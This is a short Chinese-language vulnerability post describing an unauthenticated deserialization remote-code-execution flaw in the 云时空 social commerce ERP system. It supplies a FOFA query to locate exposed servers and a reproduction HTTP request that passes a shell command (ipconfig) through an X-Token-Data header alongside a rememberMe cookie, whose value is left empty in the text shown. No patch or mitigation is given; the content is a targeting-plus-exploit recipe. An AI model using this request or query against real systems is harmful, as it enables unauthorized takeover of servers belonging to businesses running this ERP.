0x01 产品简介
云时空社会化商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以帮助您整合线上和线下交易模式,覆盖企业经营管理应用各个方面。
0x02 漏洞概述
云时空社会化商业ERP系统存在反序列化漏洞,未授权的攻击者可以通过该漏洞远程执行代码,控制服务器。
0x03 测绘语句
fofa: title="云时空社会化商业ERP系统"
0x04 漏洞复现
GET /static/js/public.js HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
X-Token-Data: ipconfig
Cookie: rememberMe=